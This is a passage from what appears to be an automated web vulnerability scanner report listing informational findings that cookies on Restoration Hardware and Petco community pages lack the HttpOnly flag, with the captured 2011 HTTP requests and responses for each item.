Last-Modified: Tue, 17 May 2011 11:11:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www51
Content-Length: 0
Content-Type: text/plain

13.78. http://cimg-1.restorationhardware.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cimg-1.restorationhardware.com
Path:	/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90007517_reset=1305510802;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm?tid=6&ci=90007517&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90007517_reset=1305510802;path=/
Expires: Sun, 15 May 2011 07:53:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.79. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Bird_Discussion_Forum/fd03p00v06d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Bird_Discussion_Forum/fd03p00v06d1?widgetId=PTWidget17&cdsn=355&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2407

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget17', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.80. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget12&cdsn=541&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2372

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget12', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.81. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget11&cdsn=560&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB002 5/15/2011 9:54:58 PM, 259 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:57 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2593

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget11', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.82. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Ferret_Discussion_Forum/fd03p00v07d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Ferret_Discussion_Forum/fd03p00v07d1?widgetId=PTWidget15&cdsn=117&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2362

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget15', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.83. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget13&cdsn=407&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2495

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget13', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.84. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget16&cdsn=887&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB030 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2532

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget16', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.85. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget14&cdsn=528&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:55:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:55:00 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2525

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget14', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentdiscussions\">\r\n\t\t\t<div cla
...[SNIP]...

13.86. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget10&cdsn=799&config=mspPolls0001&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:59 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:58 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2844

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget10', "<div class=\"os-widgetpoll\">\r\n\t<div>\r\n\t\t<div class=\"os-widgetpoll\">\r\n\t\t\t<div id=\"PTWidget10_Poll
...[SNIP]...

13.87. http://community.petco.com/n/blogs/blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/n/blogs/blog.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget9&pttv=2&nav=widget&config=recentBlogPosts0001&includeCSS=false&cdsn=889 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:54:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Served: DC2WEB001 5/15/2011 9:54:54 PM, 0 wait
X-Delphi: no
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Expires: Mon, 16 May 2011 01:54:53 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 2784

...
if(TempestNS.WIDGETMANAGER){TempestNS.WIDGETMANAGER.SetContent('PTWidget9', "<div class=\"os-sidebar\">\r\n\t<div>\r\n\t\t<div class=\"os-component os-recentblogposts\">\r\n\t\t\t<div class=
...[SNIP]...

13.88. http://community.petco.com/n/pfx/forum.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.petco.com
Path:	/n/pfx/forum.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ChameleonForumId10166=2010169:fd03p00sitez; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v03d1&widgetId=PTWidget4&pttv=2&nav=widget&config=recentDiscussions0001&includeCSS=false&cdsn=873 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
